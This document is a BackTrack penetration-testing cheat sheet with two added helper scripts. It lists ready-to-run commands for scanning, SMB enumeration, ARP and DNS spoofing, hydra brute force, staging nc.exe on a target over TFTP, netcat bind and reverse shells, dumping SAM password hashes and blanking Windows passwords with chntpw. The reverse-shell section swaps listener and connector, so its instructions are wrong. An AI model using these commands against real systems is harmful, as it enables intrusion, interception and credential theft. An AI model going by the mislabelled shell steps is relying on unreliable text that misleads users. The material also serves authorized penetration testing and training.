BACKTRACK CHEAT SHEET

NETWORKING
==========

dhclient                                  get a new IP address

OR

/etc/init.d/networking start              get a new IP address

Static IP address:
------------------
Set IP address & subnet mask:
ifconfig eth0 192.168.200.1/24

Set the default gateway:
route add default gw 192.168.200.1

Set the DNS server:
echo nameserver 192.168.200.1 > /etc/resolv.conf

IP tables
---------
iptables -t nat -F
flushes (deletes) all rules in the nat table

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
set up a rule that redirects all incoming TCP traffic for port 80 to port 10000

iptables --list
lists all iptables rules (filter table; add -t nat to see the nat table)

Port forwarding
---------------
echo 1 > /proc/sys/net/ipv4/ip_forward
enables IP forwarding in the kernel

echo 0 > /proc/sys/net/ipv4/ip_forward
disables IP forwarding

SERVICES
========

Apache server:
--------------
apachectl start                           start server on TCP port 80
apachectl stop                            stop server

SSH server:
-----------
sshd-generate                             generate SSH host keys
/usr/sbin/sshd                            start server on TCP port 22
pkill sshd                                stop server

ssh user@targetIP
connect to the SSH service

TFTP server:
------------
atftpd --daemon --port 69 /tmp/           start server on UDP port 69 with root directory /tmp
pkill atftpd                              stop server

VNC server:
-----------
vncserver                                 start server on TCP port 5901
pkill Xvnc                                stop server

Check which ports are listening:
--------------------------------
netstat -ant                              show TCP sockets (state LISTEN = listening)
netstat -anu                              show UDP sockets
netstat -ant | grep 22                    verify SSH has started
netstat -anu | grep 69                    verify TFTP has started

BASICS
======

Mount a local hard drive:
-------------------------
mount /dev/hda1 /mnt/hda1
ls -l /mnt/hda1

Mount a Windows network share:
------------------------------
share <user> <targetIP> <remote share>
share admin 192.168.200.1 c$
Enter the password for the remote share.
ls -l /mnt/share/

umount /mnt/share                         unmount share

Edit a file:
------------
nano test.sh                              create a new file and open it
<ctrl> x                                  exit
y                                         save modified buffer
<enter>                                   write changes
chmod 755 test.sh                         make the file executable
./test.sh                                 run the file

Compile a program:
------------------
* example: an exploit written in C

gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom

Install a new program:
----------------------
tar zxvf program.tar.gz                   method 2: bzip2 -cd program.tar.bz2 | tar xvf -
cd <new program folder>
./configure
make
su root
make install

FOOTPRINTING
============

Whois:
------
whois target.com                          contact info, emails, dates, name servers
ping www.target.com                       IP address of server
whois targetIP                            network range

DNS:
----
dig target.com any

A      host                 maps a domain to an IP address
PTR    pointer              maps an IP address to a domain
NS     name server          server name for a delegated zone
SOA    start of authority   zone transfer and record caching
SRV    service locator      used to locate services in the network
MX     mail                 SMTP server

host -l target.com <name server>          zone transfer

SCANNING
========

scanrand -b10M targetIP:quick

Nmap:
-----
-sS    TCP SYN scan or stealth, half open (default)
-sT    TCP full connect (very noisy)
-sU    UDP scan

-PS    SYN packet discovery (best against stateful firewalls)
-PA    ACK packet discovery (best against stateless firewalls)
-PN    don't ping

-n     no reverse DNS lookup

-A     combines -O and -sV
-O     OS fingerprinting
-sV    service version (banner)
-p     ports to scan (T:port, U:port)
-T     timing (0-5): paranoid, sneaky, polite, normal, aggressive, insane

-iL    input list of hosts to scan
-oG    grepable output to a file

Examples:

nmap -sS -PN -n targetIP

nmap -sU -PN -n targetIP

nmap -sT -PN -n targetIP -A -p <open ports> -T5 -oG scan.txt

nmap -sS -p 135,139,445 targetIP

nmap -sS -p T:1433,U:1434 targetIP

amap:
-----
amap -i scan.txt                          take the results from nmap and check for services on uncommon ports

OS FINGERPRINTING
=================

p0f -i eth0 -U -p                         use interface eth0, don't display unknown signatures, promiscuous mode
point a browser at the targetIP           p0f reads the resulting traffic

xprobe2 targetIP

BANNER GRABBING
===============

nc targetIP port                          check if the port is open

nc 192.168.200.40 <port>                  e.g.

telnet targetIP port                      telnet may yield slightly different results
HEAD / HTTP/1.0
<enter 2x>

wget targetIP                             downloads the index.html file
cat index.html | more                     view file one page at a time, space bar for next page
q                                         exit file

WINDOWS ENUMERATION
===================

nmap -sS -p 139,445 targetIP

cd /pentest/enumeration/smb-enum
nbtscan -f targetIP                       check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP              name, OS and workgroup
smbdumpusers -i targetIP                  list users
smbclient -L //targetIP                   list shares

USING WINDOWS FROM BACKTRACK
============================

net use \\targetIP\ipc$ "" /u:""          if possible, it will start a NULL session
net view \\targetIP                       view shares

smbclient:
----------
smbclient -L hostname -I targetIP         enumerate shares
smbclient //hostname/share -U ""          connect to an open share with a blank user name
smbclient //hostname/share -I targetIP -U admin    connect to a share with user name admin

rpcclient:
----------
rpcclient targetIP -U ""                  if possible, it will start a NULL session
netshareenum                              enumerate shares
enumdomusers                              enumerate users
lsaenumsid                                enumerate domain SIDs
queryuser RID                             user info, try 500, 501, 512, 1000, 1001
createdomuser                             create user account

ARP POISONING/SPOOFING
======================

ettercap:
---------
nano /usr/local/etc/etter.conf

Under the Linux section, uncomment both lines under iptables.

Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this two times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

sniffers:
---------
dsniff -i eth0

urlsnarf -i eth0

msgsnarf -i eth0

driftnet -i eth0

ARP spoof:
----------
Turn on packet forwarding:

Linux:
echo 1 > /proc/sys/net/ipv4/ip_forward

BSD:
sysctl -w net.inet.ip.forwarding=1

Sniff traffic from both a target and gateway
* The ">/dev/null 2>&1 &" part silences each process and puts it in the background so both can be run from one terminal; omit it for debugging purposes. Now any sniffer can be used on the connection.

arpspoof -t 192.168.200.1 192.168.200.32 >/dev/null 2>&1 &
arpspoof -t 192.168.200.32 192.168.200.1 >/dev/null 2>&1 &

Stop ARP poisoning/spoofing
* this should stop the ARP spoofing/poisoning on both sides immediately

killall arpspoof

DNS spoofing:
-------------
nano /usr/local/share/ettercap/etter.dns

Edit the Microsoft lines (target URL) to redirect to the attacker.

Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

EXPLOITS
========

cd /pentest/exploits/milw0rm
grep -i "<keyword>" sploitlist.txt

Some exploits are written for compilation under Windows, others for Linux.
You can identify the environment by inspecting the headers.

grep "#include" exploit.c

Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h
Linux:    arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u
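Added example, not part of the original cheat sheet: a POSIX shell classifier that sorts C sources by the header lists above instead of grepping for the substring "sys", so a file that merely mentions "system" is not mis-sorted. It assumes only grep and mktemp; the sample files it creates are constructed placeholders.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): classify a C source file
# as a Windows or Linux build by the headers it #includes, using the header
# lists from the section above. string.h is standard C and appears on both
# platforms, so it is deliberately left out of the Windows list.

WINDOWS_HEADERS='process\.h|winbase\.h|windows\.h|winsock2\.h'
LINUX_HEADERS='arpa/inet\.h|fcntl\.h|netdb\.h|netinet/in\.h|sys/socket\.h|sys/types\.h|unistd\.h'

# Print one of: windows, linux, mixed, unknown for the file named in $1.
classify_headers() {
    incs=$(grep -E '^[[:space:]]*#[[:space:]]*include' "$1" || true)
    win=0; lin=0
    if printf '%s\n' "$incs" | grep -Eq "[<\"]($WINDOWS_HEADERS)[>\"]"; then win=1; fi
    if printf '%s\n' "$incs" | grep -Eq "[<\"]($LINUX_HEADERS)[>\"]"; then lin=1; fi
    case "$win$lin" in
        10) echo windows ;;
        01) echo linux ;;
        11) echo mixed ;;
        *)  echo unknown ;;
    esac
}

# Read file names from stdin (one per line) and print only those classified
# as linux: the cheat sheet's "leave only Linux based exploits" filter, done
# by header list rather than by grepping for the substring "sys".
linux_only() {
    while IFS= read -r f; do
        if [ "$(classify_headers "$f")" = linux ]; then printf '%s\n' "$f"; fi
    done
    return 0
}

# Demo on constructed sample files (placeholder sources, not real exploits).
d=$(mktemp -d)
printf '#include <windows.h>\n#include <winsock2.h>\n' > "$d/win.c"
printf '#include <sys/socket.h>\n#include <netinet/in.h>\n' > "$d/lin.c"
printf '#include <stdio.h>\n#include <string.h>\n' > "$d/any.c"
for f in "$d"/*.c; do printf '%s: %s\n' "$(basename "$f")" "$(classify_headers "$f")"; done
printf '%s\n' "$d"/*.c | linux_only
rm -rf "$d"
```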

TFTP
====

attack box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/

target box
tftp -i 10.1.1.2 GET nc.exe

TFTP copies files with the read-only attribute set. So to delete the file:
attrib -r nc.exe
del nc.exe

NETCAT
======

attack: 10.1.1.1
target: 10.1.1.2

port scanner:
-------------
nc -v -z 10.1.1.2 1-1024                  scans ports 1 to 1024 (very slow because of -z; remove -z to speed it up, but it is not as stealthy)

chat session:
-------------
target:   nc -lvp 4444                    start Netcat and listen verbosely on port 4444
attacker: nc -v 10.1.1.2 4444

transfer file to target:
------------------------
target:   nc -lvp 4444 > output.txt
attacker: nc -v 10.1.1.2 4444 < test.txt

Bind shell:
-----------
target:   nc -lvp 4444 -e cmd.exe         the attacker should end up at a command prompt of the target
attacker: nc -v 10.1.1.2 4444

Reverse shell:
--------------
target:   nc -lvp 4444
attacker: nc -v 10.1.1.2 4444 -e /bin/bash

The target should be sitting at an invisible command prompt of the attacker. You will not see the prompt. Issue any Linux command to verify.

PASSWORDS
=========

Word list:
----------
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l
About 306,000 passwords.

Brute force:
------------
ftp with a user name ftp
hydra -l ftp -P words -v targetIP ftp

pop3 with a user name muts
hydra -l muts -P words -v targetIP pop3

snmp
hydra -P words -v targetIP snmp

Microsoft VPN
nmap -p 1723 targetIP

dos2unix words
cat words | thc-pptp-bruter targetIP

PHYSICAL ACCESS
===============

Mount an NTFS partition in read/write mode:
-------------------------------------------
Boot your box with BackTrack.

mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1

Dump the SAM file:
------------------
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
cat hash.txt

Modify SAM file directly:
-------------------------
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password:  *
Do you really wish to change it?  y
Write hive files?  y
umount /mnt/sda1
reboot

Accessing the host/guest shared folders via VMware image
--------------------------------------------------------
Location to go to from the VMware image: /mnt/hgfs

* Inside this location will be the shared folders you have allowed from within the VMware settings.

List all Unix users
-------------------
To list all users on a Unix system, even the ones who are not logged in, look at the /etc/passwd file.

$ cat /etc/passwd
…
george:*:1009:1009:George Washington:/home/george:/usr/bin/bash
tom:*:1016:1016:Thomas Jefferson:/home/tom:/usr/bin/bash
al:*:1017:1017:Alexander Hamilton:/home/alex:/usr/bin/bash
…

You can use the `cut` command to see only one field from the passwd file.

For example, to see just the Unix user names, use the command "cat /etc/passwd | cut -d: -f1".

$ cat /etc/passwd | cut -d: -f1
…
george
tom
al
…

Or, to see only the GECOS field (i.e. the account holder's real name), try this:

$ cat /etc/passwd | cut -d: -f5
…
George Washington
Thomas Jefferson
Alexander Hamilton
…

Note that you will also see Unix system accounts, such as "root", "bin", and "daemon", in the /etc/passwd file. These system accounts are not Unix users.
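Added example, not part of the original cheat sheet: a POSIX shell script that goes one step past the cut commands above and separates human users from the system accounts the note mentions, and shows which entries have a shell that allows login at all. It assumes only awk and coreutils; the passwd data it reads is a constructed sample, not a real system's file.

```shell
#!/bin/sh
# Added example (not from the original cheat sheet): split an /etc/passwd-style
# file into human users and system accounts and list who can actually log in.
# Takes the passwd file as $1 so it can run offline on the constructed sample.

# Constructed sample in passwd format (not a real system's file).
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
george:x:1009:1009:George Washington:/home/george:/usr/bin/bash
tom:x:1016:1016:Thomas Jefferson:/home/tom:/usr/bin/bash
al:x:1017:1017:Alexander Hamilton:/home/alex:/usr/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin'

# Print "user<TAB>GECOS name" for accounts with UID >= threshold ($2,
# default 1000). 1000 is the usual first human UID on Linux; it is a
# convention, not a rule, so it is a parameter.
human_users() {
    awk -F: -v min="${2:-1000}" '$3 >= min { print $1 "\t" $5 }' "$1"
}

# Print system accounts (UID below the threshold), which the cheat sheet
# notes are not real users.
system_accounts() {
    awk -F: -v min="${2:-1000}" '$3 < min { print $1 }' "$1"
}

# Print accounts whose login shell is not nologin or false, i.e. who could
# get an interactive session if they had a password or key.
login_capable() {
    awk -F: '$7 !~ /(nologin|false)$/ { print $1 }' "$1"
}

# Count entries, like "cat /etc/passwd | wc -l" in the cheat sheet.
count_accounts() {
    wc -l < "$1" | tr -d ' '
}

# Demo on the constructed sample.
tmp=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmp"
echo "Human users:";     human_users "$tmp"
echo "System accounts:"; system_accounts "$tmp"
echo "Login-capable:";   login_capable "$tmp"
echo "Total entries: $(count_accounts "$tmp")"
rm -f "$tmp"
```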
